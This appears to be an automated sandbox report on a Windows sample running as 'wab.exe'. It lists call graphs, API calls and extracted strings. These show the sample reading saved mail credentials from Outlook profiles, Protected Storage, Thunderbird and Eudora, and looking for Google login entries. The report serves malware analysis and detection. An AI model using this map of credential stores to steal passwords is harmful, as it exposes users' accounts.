33721->33842 33730 403e3b 33732 403e73 33730->33732 33733 403e46 _mbscpy 33730->33733 33889 40fb00 33732->33889 33941 40f334 334 API calls 33733->33941 33741->33512 33743 4037c5 33742->33743 33744 4036fb 33742->33744 33743->33678 33942 410863 UuidFromStringA UuidFromStringA memcpy 33744->33942 33746 40370e 33746->33743 33747 403716 strchr 33746->33747 33747->33743 33748 403730 33747->33748 33943 4021b6 memset 33748->33943 33750 40373f _mbscpy _mbscpy strlen 33751 4037a4 _mbscpy 33750->33751 33752 403789 sprintf 33750->33752 33944 4023e5 16 API calls 33751->33944 33752->33751 33755 4085e2 33754->33755 33945 4082cd 11 API calls 33755->33945 33759 408600 33760 403cba 33759->33760 33761 40860b memset 33759->33761 33772 40821d 33760->33772 33948 410b62 RegEnumKeyExA 33761->33948 33763 4086d2 RegCloseKey 33763->33760 33765 408637 33765->33763 33766 40865c memset 33765->33766 33949 410a9c RegOpenKeyExA 33765->33949 33952 410b62 RegEnumKeyExA 33765->33952 33950 410add RegQueryValueExA 33766->33950 33769 408694 33951 40848b 10 API calls 33769->33951 33771 4086ab RegCloseKey 33771->33765 33953 410a9c RegOpenKeyExA 33772->33953 33774 40823f 33775 403cc6 33774->33775 33776 408246 memset 33774->33776 33784 4086e0 33775->33784 33954 410b62 RegEnumKeyExA 33776->33954 33778 4082bf RegCloseKey 33778->33775 33780 40826f 33780->33778 33955 410a9c RegOpenKeyExA 33780->33955 33956 4080ed 11 API calls 33780->33956 33957 410b62 RegEnumKeyExA 33780->33957 33783 4082a2 RegCloseKey 33783->33780 33958 4045db 33784->33958 33786 4088ef 33966 404656 33786->33966 33790 408737 wcslen 33790->33786 33796 40876a 33790->33796 33791 40877a _wcsncoll 33791->33796 33793 404734 3 API calls 33793->33796 33794 404785 FreeLibrary 33794->33796 33795 408812 memset 33795->33796 33797 40883c memcpy wcschr 33795->33797 33796->33786 33796->33791 33796->33793 33796->33794 33796->33795 33796->33797 33798 4088c3 LocalFree 33796->33798 33969 40466b _mbscpy 33796->33969 33797->33796 33798->33796 33799 410a9c RegOpenKeyExA 33799->33691 33800->33695 33970 410a9c RegOpenKeyExA 33801->33970 33803 402c7a 33804 402da5 33803->33804 33805 402c87 memset 33803->33805 33804->33700 33971 410b62 RegEnumKeyExA 33805->33971 33807 402d9c RegCloseKey 33807->33804 33808 410b1e 3 API calls 33809 402ce4 memset sprintf 33808->33809 33972 410a9c RegOpenKeyExA 33809->33972 33811 402d28 33812 402d3a sprintf 33811->33812 33973 402bd1 39 API calls 33811->33973 33974 410a9c RegOpenKeyExA 33812->33974 33815 402cb2 33815->33807 33815->33808 33818 402d9a 33815->33818 33975 402bd1 39 API calls 33815->33975 33976 410b62 RegEnumKeyExA 33815->33976 33818->33807 33819->33703 33820->33707 33821->33711 33823 410816 33822->33823 33824 4107f1 FreeLibrary 33823->33824 33825 403ddd 33824->33825 33825->33716 33977 410a9c RegOpenKeyExA 33826->33977 33828 402ff9 33829 403006 memset 33828->33829 33830 40312c 33828->33830 33978 410b62 RegEnumKeyExA 33829->33978 33830->33720 33832 403122 RegCloseKey 33832->33830 33833 410b1e 3 API calls 33834 403058 memset sprintf 33833->33834 33979 410a9c RegOpenKeyExA 33834->33979 33836 403033 33836->33832 33836->33833 33837 4030a2 memset 33836->33837 33838 410b62 RegEnumKeyExA 33836->33838 33840 4030f9 RegCloseKey 33836->33840 33981 402db3 26 API calls 33836->33981 33980 410b62 RegEnumKeyExA 33837->33980 33838->33836 33840->33836 33843 4032d5 33842->33843 33844 4033a9 33842->33844 33982 4021b6 memset 33843->33982 33857 4034e4 memset memset 33844->33857 33846 4032e1 33983 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33846->33983 33848 4032ea 33849 4032f8 memset GetPrivateProfileSectionA 33848->33849 33984 4023e5 16 API calls 33848->33984 33849->33844 33854 40332f 33849->33854 33851 40339b strlen 33851->33844 33851->33854 33853 403350 strchr 33853->33854 33854->33844 33854->33851 33985 4021b6 memset 33854->33985 33986 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33854->33986 33987 4023e5 16 API calls 33854->33987 33858 410b1e 3 API calls 33857->33858 33859 40353f 33858->33859 33860 40357f 33859->33860 33861 403546 _mbscpy 33859->33861 33865 403985 33860->33865 33988 406d55 strlen _mbscat 33861->33988 33863 403565 _mbscat 33989 4033f0 19 API calls 33863->33989 33990 40466b _mbscpy 33865->33990 33869 4039aa 33871 4039ff 33869->33871 33991 40f460 memset memset 33869->33991 34012 40f6e2 33869->34012 34028 4038e8 21 API calls 33869->34028 33872 404785 FreeLibrary 33871->33872 33873 403a0b 33872->33873 33874 4037ca memset memset 33873->33874 34036 444551 memset 33874->34036 33876 4038e2 33876->33730 33940 40f334 334 API calls 33876->33940 33879 40382e 33880 406f06 2 API calls 33879->33880 33881 403843 33880->33881 33882 406f06 2 API calls 33881->33882 33883 403855 strchr 33882->33883 33884 403884 _mbscpy 33883->33884 33885 403897 strlen 33883->33885 33886 4038bf _mbscpy 33884->33886 33885->33886 33887 4038a4 sprintf 33885->33887 34048 4023e5 16 API calls 33886->34048 33887->33886 33890 44b090 33889->33890 33891 40fb10 RegOpenKeyExA 33890->33891 33892 403e7f 33891->33892 33893 40fb3b RegOpenKeyExA 33891->33893 33903 40f96c 33892->33903 33894 40fb55 RegQueryValueExA 33893->33894 33895 40fc2d RegCloseKey 33893->33895 33896 40fc23 RegCloseKey 33894->33896 33897 40fb84 33894->33897 33895->33892 33896->33895 33898 404734 3 API calls 33897->33898 33899 40fb91 33898->33899 33899->33896 33900 40fc19 LocalFree 33899->33900 33901 40fbdd memcpy memcpy 33899->33901 33900->33896 34053 40f802 11 API calls 33901->34053 33904 4070ae GetVersionExA 33903->33904 33905 40f98d 33904->33905 33906 4045db 7 API calls 33905->33906 33910 40f9a9 33906->33910 33907 40fae6 33908 404656 FreeLibrary 33907->33908 33909 403e85 33908->33909 33915 4442ea memset 33909->33915 33910->33907 33911 40fa13 memset WideCharToMultiByte 33910->33911 33911->33910 33912 40fa43 _strnicmp 33911->33912 33912->33910 33913 40fa5b WideCharToMultiByte 33912->33913 33913->33910 33914 40fa88 WideCharToMultiByte 33913->33914 33914->33910 33916 410dbb 9 API calls 33915->33916 33917 444329 33916->33917 34054 40759e strlen strlen 33917->34054 33922 410dbb 9 API calls 33923 444350 33922->33923 33924 40759e 3 API calls 33923->33924 33925 44435a 33924->33925 33926 444212 65 API calls 33925->33926 33927 444366 memset memset 33926->33927 33928 410b1e 3 API calls 33927->33928 33929 4443b9 ExpandEnvironmentStringsA strlen 33928->33929 33930 4443f4 _strcmpi 33929->33930 33931 4443e5 33929->33931 33932 403e91 33930->33932 33933 44440c 33930->33933 33931->33930 33932->33510 33934 444212 65 API calls 33933->33934 33934->33932 33935->33692 33936->33696 33937->33704 33938->33708 33939->33712 33940->33730 33941->33732 33942->33746 33943->33750 33944->33743 33946 40841c 33945->33946 33947 410a9c RegOpenKeyExA 33946->33947 33947->33759 33948->33765 33949->33765 33950->33769 33951->33771 33952->33765 33953->33774 33954->33780 33955->33780 33956->33783 33957->33780 33959 404656 FreeLibrary 33958->33959 33960 4045e3 LoadLibraryA 33959->33960 33961 404651 33960->33961 33962 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33960->33962 33961->33786 33961->33790 33963 40463d 33962->33963 33964 404643 33963->33964 33965 404656 FreeLibrary 33963->33965 33964->33961 33965->33961 33967 403cd2 33966->33967 33968 40465c FreeLibrary 33966->33968 33967->33799 33968->33967 33969->33796 33970->33803 33971->33815 33972->33811 33973->33812 33974->33815 33975->33815 33976->33815 33977->33828 33978->33836 33979->33836 33980->33836 33981->33836 33982->33846 33983->33848 33984->33849 33985->33853 33986->33854 33987->33854 33988->33863 33989->33860 33990->33869 34029 4078ba 33991->34029 33994 4078ba _mbsnbcat 33995 40f5a3 RegOpenKeyExA 33994->33995 33996 40f5c3 RegQueryValueExA 33995->33996 33997 40f6d9 33995->33997 33998 40f6d0 RegCloseKey 33996->33998 33999 40f5f0 33996->33999 33997->33869 33998->33997 33999->33998 34000 40f675 33999->34000 34033 40466b _mbscpy 33999->34033 34000->33998 34034 4012ee strlen 34000->34034 34002 40f611 34004 404734 3 API calls 34002->34004 34009 40f616 34004->34009 34005 40f69e RegQueryValueExA 34005->33998 34006 40f6c1 34005->34006 34006->33998 34007 40f66a 34008 404785 FreeLibrary 34007->34008 34008->34000 34009->34007 34010 40f661 LocalFree 34009->34010 34011 40f645 memcpy 34009->34011 34010->34007 34011->34010 34035 40466b _mbscpy 34012->34035 34014 40f6fa 34015 4045db 7 API calls 34014->34015 34016 40f708 34015->34016 34017 404734 3 API calls 34016->34017 34022 40f7e2 34016->34022 34023 40f715 34017->34023 34018 404656 FreeLibrary 34019 40f7f1 34018->34019 34020 404785 FreeLibrary 34019->34020 34021 40f7fc 34020->34021 34021->33869 34022->34018 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33869 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33994 34033->34002 34034->34005 34035->34014 34049 410a9c RegOpenKeyExA 34036->34049 34038 44458b 34039 40381a 34038->34039 34050 410add RegQueryValueExA 34038->34050 34039->33876 34047 4021b6 memset 34039->34047 34041 4445a4 34042 4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34039 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33879 34048->33876 34049->34038 34050->34041 34051->34044 34052->34046 34053->33900 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34095 444196 52 API calls 34062->34095 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34092 407f90 34066->34092 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34096 407e62 strcmp strcmp 34070->34096 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33922 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34097 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34097 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34085 407f3f 34083->34085 34086 407f46 strlen strlen 34084->34086 34087 407f3a 34084->34087 34085->34086 34089 407f7f 34085->34089 34086->34089 34090 407f76 34086->34090 34088 407f90 FindClose 34087->34088 34088->34085 34089->34060 34098 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34098 34093 407fa3 34092->34093 34094 407f99 FindClose 34092->34094 34093->34071 34094->34093 34095->34060 34096->34070 34097->34080 34098->34089 34099->33524 34100->33528 34101->33534 34102->33536 34103->33541 34104->33538 34105->33533 34114 411853 RtlInitializeCriticalSection memset 34115 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34288 40a256 13 API calls 34290 432e5b 17 API calls 34292 43fa5a 20 API calls 34117 401060 41 API calls 34295 427260 CloseHandle memset memset 33198 410c68 FindResourceA 33199 410c81 SizeofResource 33198->33199 33202 410cae 33198->33202 33200 410c92 LoadResource 33199->33200 33199->33202 33201 410ca0 LockResource 33200->33201 33200->33202 33201->33202 34297 405e69 14 API calls 34122 433068 15 API calls __fprintf_l 34299 414a6d 18 API calls 34300 43fe6f 134 API calls 34124 424c6d 15 API calls __fprintf_l 34301 426741 19 API calls 34126 440c70 17 API calls 34127 443c71 44 API calls 34130 427c79 24 API calls 34304 416e7e memset __fprintf_l 34134 42800b 47 API calls 34135 425115 85 API calls __fprintf_l 34307 41960c 61 API calls 34136 43f40c 122 API calls __fprintf_l 34139 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34140 43f81a 20 API calls 34142 414c20 memset memset 34143 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34311 414625 18 API calls 34312 404225 modf 34313 403a26 strlen WriteFile 34315 40422a 12 API calls 34319 427632 memset memset memcpy 34320 40ca30 59 API calls 34321 404235 26 API calls 34144 42ec34 61 API calls __fprintf_l 34145 425115 76 API calls __fprintf_l 34322 425115 77 API calls __fprintf_l 34324 44223a 38 API calls 34151 43183c 112 API calls 34325 44b2c5 _onexit __dllonexit 34330 42a6d2 memcpy __allrem 34153 405cda 65 API calls 34338 43fedc 138 API calls 34339 4116e1 16 API calls __fprintf_l 34156 4244e6 19 API calls 34158 42e8e8 127 API calls __fprintf_l 34159 4118ee RtlLeaveCriticalSection 34344 43f6ec 22 API calls 34161 425115 119 API calls __fprintf_l 33188 410cf3 EnumResourceNamesA 34347 4492f0 memcpy memcpy 34349 43fafa 18 API calls 34351 4342f9 15 API calls __fprintf_l 34162 4144fd 19 API calls 34353 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34354 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34357 443a84 _mbscpy 34359 43f681 17 API calls 34165 404487 22 API calls 34361 415e8c 16 API calls __fprintf_l 34169 411893 RtlDeleteCriticalSection __fprintf_l 34170 41a492 42 API calls 34365 403e96 34 API calls 34366 410e98 memset SHGetPathFromIDList SendMessageA 34172 426741 109 API calls __fprintf_l 34173 4344a2 18 API calls 34174 4094a2 10 API calls 34369 4116a6 15 API calls __fprintf_l 34370 43f6a4 17 API calls 34371 440aa3 20 API calls 34373 427430 45 API calls 34177 4090b0 7 API calls 34178 4148b0 15 API calls 34180 4118b4 RtlEnterCriticalSection 34181 4014b7 CreateWindowExA 34182 40c8b8 19 API calls 34184 4118bf RtlTryEnterCriticalSection 34378 42434a 18 API calls __fprintf_l 34380 405f53 12 API calls 34192 43f956 59 API calls 34194 40955a 17 API calls 34195 428561 36 API calls 34196 409164 7 API calls 34384 404366 19 API calls 34388 40176c ExitProcess 34391 410777 42 API calls 34201 40dd7b 51 API calls 34202 425d7c 16 API calls __fprintf_l 34393 43f6f0 25 API calls 34394 42db01 22 API calls 34203 412905 15 API calls __fprintf_l 34395 403b04 54 API calls 34396 405f04 SetDlgItemTextA GetDlgItemTextA 34397 44b301 ??3@YAXPAX 34400 4120ea 14 API calls 3 library calls 34401 40bb0a 8 API calls 34403 413f11 strcmp 34207 434110 17 API calls __fprintf_l 34210 425115 108 API calls __fprintf_l 34404 444b11 _onexit 34212 425115 76 API calls __fprintf_l 34215 429d19 10 API calls 34407 444b1f __dllonexit 34408 409f20 _strcmpi 34217 42b927 31 API calls 34411 433f26 19 API calls __fprintf_l 34412 44b323 FreeLibrary 34413 427f25 46 API calls 34414 43ff2b 17 API calls 34415 43fb30 19 API calls 34224 414d36 16 API calls 34226 40ad38 7 API calls 34417 433b38 16 API calls __fprintf_l 34418 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34230 426741 21 API calls 34231 40c5c3 125 API calls 34233 43fdc5 17 API calls 34419 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34236 4161cb memcpy memcpy memcpy memcpy 33203 44b3cf 33204 44b3e6 33203->33204 33206 44b454 33203->33206 33204->33206 33210 44b40e 33204->33210 33207 44b405 33207->33206 33208 44b435 VirtualProtect 33207->33208 33208->33206 33209 44b444 VirtualProtect 33208->33209 33209->33206 33211 44b413 33210->33211 33214 44b454 33211->33214 33217 44b42b 33211->33217 33213 44b41c 33213->33214 33215 44b435 VirtualProtect 33213->33215 33215->33214 33216 44b444 VirtualProtect 33215->33216 33216->33214 33218 44b431 33217->33218 33219 44b435 VirtualProtect 33218->33219 33221 44b454 33218->33221 33220 44b444 VirtualProtect 33219->33220 33219->33221 33220->33221 34424 43ffc8 18 API calls 34237 4281cc 15 API calls __fprintf_l 34426 4383cc 110 API calls __fprintf_l 34238 4275d3 41 API calls 34427 4153d3 22 API calls __fprintf_l 34239 444dd7 _XcptFilter 34432 4013de 15 API calls 34434 425115 111 API calls __fprintf_l 34435 43f7db 18 API calls 34438 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34241 4335ee 16 API calls __fprintf_l 34440 429fef 11 API calls 34242 444deb _exit _c_exit 34441 40bbf0 138 API calls 34245 425115 79 API calls __fprintf_l 34445 437ffa 22 API calls 34249 4021ff 14 API calls 34250 43f5fc 149 API calls 34446 40e381 9 API calls 34252 405983 40 API calls 34253 42b186 27 API calls __fprintf_l 34254 427d86 76 API calls 34255 403585 20 API calls 34257 42e58e 18 API calls __fprintf_l 34260 425115 75 API calls __fprintf_l 34262 401592 8 API calls 33189 410b92 33192 410a6b 33189->33192 33191 410bb2 33193 410a77 33192->33193 33194 410a89 GetPrivateProfileIntA 33192->33194 33197 410983 memset _itoa WritePrivateProfileStringA 33193->33197 33194->33191 33196 410a84 33196->33191 33197->33196 34450 434395 16 API calls 34264 441d9c memcmp 34452 43f79b 119 API calls 34265 40c599 43 API calls 34453 426741 87 API calls 34269 4401a6 21 API calls 34271 426da6 memcpy memset memset memcpy 34272 4335a5 15 API calls 34274 4299ab memset memset memcpy memset memset 34275 40b1ab 8 API calls 34458 425115 76 API calls __fprintf_l 34462 4113b2 18 API calls 2 library calls 34466 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33235 40765c 33233->33235 33234->33232 33236 4076a3 33235->33236 33239 40737c strtoul 33235->33239 33236->33232 33238->33231 33239->33235 34277 40b5bf memset memset _mbsicmp

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                    APIs
                                    • memset.MSVCRT ref: 0040832F
                                    • memset.MSVCRT ref: 00408343
                                    • memset.MSVCRT ref: 0040835F
                                    • memset.MSVCRT ref: 00408376
                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                    • strlen.MSVCRT ref: 004083E9
                                    • strlen.MSVCRT ref: 004083F8
                                    • memcpy.MSVCRT ref: 0040840A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                    • String ID: 5$H$O$b$i$}$}
                                    • API String ID: 1832431107-3760989150
                                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                    APIs
                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                    • strlen.MSVCRT ref: 00407F5C
                                    • strlen.MSVCRT ref: 00407F64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileFindstrlen$FirstNext
                                    • String ID: ACD
                                    • API String ID: 379999529-620537770
                                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 00401E8B
                                    • strlen.MSVCRT ref: 00401EA4
                                    • strlen.MSVCRT ref: 00401EB2
                                    • strlen.MSVCRT ref: 00401EF8
                                    • strlen.MSVCRT ref: 00401F06
                                    • memset.MSVCRT ref: 00401FB1
                                    • atoi.MSVCRT ref: 00401FE0
                                    • memset.MSVCRT ref: 00402003
                                    • sprintf.MSVCRT ref: 00402030
                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                    • memset.MSVCRT ref: 00402086
                                    • memset.MSVCRT ref: 0040209B
                                    • strlen.MSVCRT ref: 004020A1
                                    • strlen.MSVCRT ref: 004020AF
                                    • strlen.MSVCRT ref: 004020E2
                                    • strlen.MSVCRT ref: 004020F0
                                    • memset.MSVCRT ref: 00402018
                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                    • _mbscpy.MSVCRT ref: 00402177
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                    • API String ID: 1846531875-4223776976
                                    • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                    • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                    • API String ID: 745651260-375988210
                                    • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                    • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                    • _mbscpy.MSVCRT ref: 00403E54
                                    Strings
                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                    • PStoreCreateInstance, xrefs: 00403C44
                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                    • pstorec.dll, xrefs: 00403C30
                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                    • API String ID: 1197458902-317895162
                                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 